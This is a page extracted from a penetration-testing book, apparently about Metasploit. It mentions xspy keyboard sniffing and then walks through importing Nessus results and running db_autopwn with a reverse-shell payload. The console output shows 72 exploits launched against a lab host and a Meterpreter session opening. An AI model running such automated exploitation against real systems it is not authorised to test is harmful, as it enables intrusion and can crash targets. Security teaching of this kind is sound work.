background image

56

Chapter 4

The 

xspy

 tool remotely sniffs the X server’s keyboard session and has cap-

tured a user running SSH to log in as root on a remote system. Vulnerabilities 
such as this can be rare, but when you find them they are extremely valuable.

Using Scan Results for Autopwning

Let’s take a quick diversion into exploitation. Metasploit’s Autopwn tool auto-
matically targets and exploits a system using an open port or using the results 
of a vulnerability scan export. You can use Autopwn to harness the results of 
most vulnerability scanners, including NeXpose, Nessus, and OpenVAS.

For example, here’s how we could use a Nessus results import to target a 

system and autopwn it. Create a new database with 

db_connect

 and use 

db_import

 

to import the scan report. In the next example, we run 

db_autopwn

 with a 

series of switches to launch attacks against all targets (

e

), show all matching 

modules (

t

), use a reverse shell payload (

r

), select exploit modules based on 

vulnerability (

x

), and also select based on open ports (

p

). Once 

db_autopwn

 

launches, Metasploit begins launching exploits at the targets. Successful 
exploits return a shell to the attacking machine.

msf > 

db_connect postgres:toor@127.0.0.1/msf3

msf > 

db_import /root/nessus.nbe

msf > 

db_autopwn –e –t –r -x -p 

 [*] (

1/72

 [0 sessions]): Launching exploit/windows/mssql/ms09_004_sp_replwritetovarbin

against 192.168.33.130:1433...

[*] (2/72 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.33.130:445...
[*] (3/72 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against

192.168.33.130:445...

. . . SNIP . . .

[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)

 [*] Meterpreter session 

1 opened

 (192.168.1.101:40912 -> 192.168.1.115:15991)

[*] (72/72 [1 sessions]): Waiting on 2 launched modules to finish execution...
[*] (72/72 [1 sessions]): Waiting on 0 launched modules to finish execution...

Based on these scans, Autopwn launched 72 exploits   and one was suc-

cessful, as shown at  . This exploit allows us full access to the machine with a 
Meterpreter console that will be discussed in far more depth in Chapter 6.

NOTE

One big caveat to remember when using Autopwn: If you’re going in with your Autopwn 
guns blazing, the target system can crash or lose stability. Autopwn has useful features 
not covered here, such as the ability to select only exploits that have an “Excellent” rank-
ing, meaning it is very unlikely they will crash the remote system or service. For more 
information on its usage, enter 

db_autopwn –h

.